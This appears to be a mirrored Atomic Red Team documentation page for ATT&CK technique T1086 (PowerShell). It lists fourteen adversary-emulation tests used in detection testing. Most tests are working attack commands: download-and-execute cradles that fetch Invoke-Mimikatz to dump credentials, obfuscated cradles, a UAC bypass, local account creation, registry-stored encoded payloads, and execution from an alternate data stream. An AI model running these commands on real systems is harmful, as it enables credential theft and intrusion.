security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
1663bf7d524b6fc8a9a39104feb2949b36368dfc
atomic-red-team/atomics/T1086/T1086.md
T
CircleCI Atomic Red Team doc generator e940fcbe5b Generate docs from job=validate_atomics_generate_docs branch=master
2019-10-24 17:13:51 +00:00

345 lines
13 KiB
Markdown
Raw Blame History

# T1086 - PowerShell
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1086)
<blockquote>PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer.
PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.
Administrator permissions are required to use PowerShell to connect to remote systems.
A number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363), PowerSploit, (Citation: Powersploit) and PSAttack. (Citation: Github PSAttack)
PowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell's underlying System.Management.Automation assembly exposed through the .NET framework and Windows Common Language Interface (CLI). (Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015) (Citation: Microsoft PSfromCsharp APR 2014)</blockquote>
## Atomic Tests
- [Atomic Test #1 - Mimikatz](#atomic-test-1---mimikatz)
- [Atomic Test #2 - BloodHound](#atomic-test-2---bloodhound)
- [Atomic Test #3 - Obfuscation Tests](#atomic-test-3---obfuscation-tests)
- [Atomic Test #4 - Mimikatz - Cradlecraft PsSendKeys](#atomic-test-4---mimikatz---cradlecraft-pssendkeys)
- [Atomic Test #5 - Invoke-AppPathBypass](#atomic-test-5---invoke-apppathbypass)
- [Atomic Test #6 - PowerShell Add User](#atomic-test-6---powershell-add-user)
- [Atomic Test #7 - Powershell MsXml COM object - no prompt](#atomic-test-7---powershell-msxml-com-object---no-prompt)
- [Atomic Test #8 - Powershell MsXml COM object - with prompt](#atomic-test-8---powershell-msxml-com-object---with-prompt)
- [Atomic Test #9 - Powershell XML requests](#atomic-test-9---powershell-xml-requests)
- [Atomic Test #10 - Powershell invoke mshta.exe download](#atomic-test-10---powershell-invoke-mshtaexe-download)
- [Atomic Test #11 - Powershell Invoke-DownloadCradle](#atomic-test-11---powershell-invoke-downloadcradle)
- [Atomic Test #12 - PowerShell Fileless Script Execution](#atomic-test-12---powershell-fileless-script-execution)
- [Atomic Test #13 - PowerShell Downgrade Attack](#atomic-test-13---powershell-downgrade-attack)
- [Atomic Test #14 - NTFS Alternate Data Stream Access](#atomic-test-14---ntfs-alternate-data-stream-access)
<br/>
## Atomic Test #1 - Mimikatz
Download Mimikatz and dump credentials
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| mimurl | Mimikatz url | url | https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1|
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
```
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
```
<br/>
<br/>
## Atomic Test #2 - BloodHound
Download Bloodhound and run it
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| bloodurl | BloodHound URL | url | https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1|
#### Run it with `command_prompt`!
```
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{bloodurl}'); Invoke-BloodHound"
```
<br/>
<br/>
## Atomic Test #3 - Obfuscation Tests
Different obfuscated methods to test
Reaches out to bit.ly/L3g1t to stdout: "SUCCESSFULLY EXECUTED POWERSHELL CODE FROM REMOTE LOCATION"
**Supported Platforms:** Windows
#### Run it with `powershell`!
```
(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))
(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');[ScriptBlock]::Create((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))).InvokeReturnAsIs()
Set-Variable HJ1 'http://bit.ly/L3g1tCrad1e';SI Variable:/0W 'Net.WebClient';Set-Item Variable:\gH 'Default_File_Path.ps1';ls _-*;Set-Variable igZ (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|?{$_.Name-like'*Cm*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|GM|?{$_.Name-like'*om*e'}).Name).Invoke('*w-*ct',$TRUE,1))(Get-ChildItem Variable:0W).Value);Set-Variable J ((((Get-Variable igZ -ValueOn)|GM)|?{$_.Name-like'*w*i*le'}).Name);(Get-Variable igZ -ValueOn).((ChildItem Variable:J).Value).Invoke((Get-Item Variable:/HJ1).Value,(GV gH).Value);&( ''.IsNormalized.ToString()[13,15,48]-Join'')(-Join([Char[]](CAT -Enco 3 (GV gH).Value)))
```
<br/>
<br/>
## Atomic Test #4 - Mimikatz - Cradlecraft PsSendKeys
Run mimikatz via PsSendKeys
**Supported Platforms:** Windows
#### Run it with `powershell`! Elevation Required (e.g. root or admin)
```
$url='https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
```
<br/>
<br/>
## Atomic Test #5 - Invoke-AppPathBypass
Note: Windows 10 only
Bypass is based on: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
```
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/master/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
```
<br/>
<br/>
## Atomic Test #6 - PowerShell Add User
Using PS 5.1, add a user via CLI
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| user_name | username to add | string | atomic_user|
| full_name | Full name of user | string | Atomic Red Team|
| password | password to use | string | ATOM1CR3DT3@M|
| description | Brief description of account | string | Atomic Things|
#### Run it with `powershell`! Elevation Required (e.g. root or admin)
```
New-LocalUser -FullName '#{full_name}' -Name '#{user_name}' -Password #{password} -Description '#{description}'
```
<br/>
<br/>
## Atomic Test #7 - Powershell MsXml COM object - no prompt
Provided by https://github.com/mgreen27/mgreen27.github.io
Powershell MsXml COM object.
Not proxy aware removing cache although does not appear to write to those locations
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.ps1|
#### Run it with `command_prompt`!
```
powershell.exe IEX -exec bypass -windowstyle hidden -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
```
<br/>
<br/>
## Atomic Test #8 - Powershell MsXml COM object - with prompt
Provided by https://github.com/mgreen27/mgreen27.github.io
Powershell MsXml COM object.
Not proxy aware removing cache although does not appear to write to those locations
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.ps1|
#### Run it with `command_prompt`!
```
powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
```
<br/>
<br/>
## Atomic Test #9 - Powershell XML requests
Provided by https://github.com/mgreen27/mgreen27.github.io
Powershell xml download request
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.xml|
#### Run it with `command_prompt`!
```
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -windowstyle hidden -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
```
<br/>
<br/>
## Atomic Test #10 - Powershell invoke mshta.exe download
Provided by https://github.com/mgreen27/mgreen27.github.io
Powershell invoke mshta to download payload
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/mshta.sct|
#### Run it with `powershell`!
```
"C:\Windows\system32\cmd.exe" /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
```
<br/>
<br/>
## Atomic Test #11 - Powershell Invoke-DownloadCradle
Provided by https://github.com/mgreen27/mgreen27.github.io
Invoke-DownloadCradle is used to generate Network and Endpoint artifacts.
**Supported Platforms:** Windows
#### Run it with these steps!
1. Open Powershell_ise as a Privileged Account
2. Invoke-DownloadCradle.ps1
<br/>
<br/>
## Atomic Test #12 - PowerShell Fileless Script Execution
Execution of a PowerShell payload from the Windows Registry similar to that seen in fileless malware infections.
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
```
REM Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI="
powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
```
#### Cleanup Commands:
```
del /Q /F %SystemRoot%\Temp\art-marker.txt
REG DELETE "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /f
```
<br/>
<br/>
## Atomic Test #13 - PowerShell Downgrade Attack
Attempts to run powershell commands in version 2.0 https://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/
**Supported Platforms:** Windows
#### Run it with `powershell`!
```
powershell.exe -version 2 -Command Write-Host $PSVersion
```
#### Commands to Check Prerequisites:
```
if(2 -in $PSVersionTable.PSCompatibleVersions.Major){0}else{1}
```
<br/>
<br/>
## Atomic Test #14 - NTFS Alternate Data Stream Access
Creates a file with an alternate data stream and simulates executing that hidden code/file
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| ads_file | File created to store Alternate Stream Data | String | $env:TEMP\NTFS_ADS.txt|
#### Run it with `powershell`!
```
Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
Invoke-Expression $streamcommand
```
#### Commands to Check Prerequisites:
```
if((Get-Volume -DriveLetter $env:HOMEDRIVE[0]).FileSystem -contains "NTFS"){0}else{1}
```
#### Cleanup Commands:
```
Remove:Item #{ads_file}
```
<br/>
Reference in New Issue View Git Blame Copy Permalink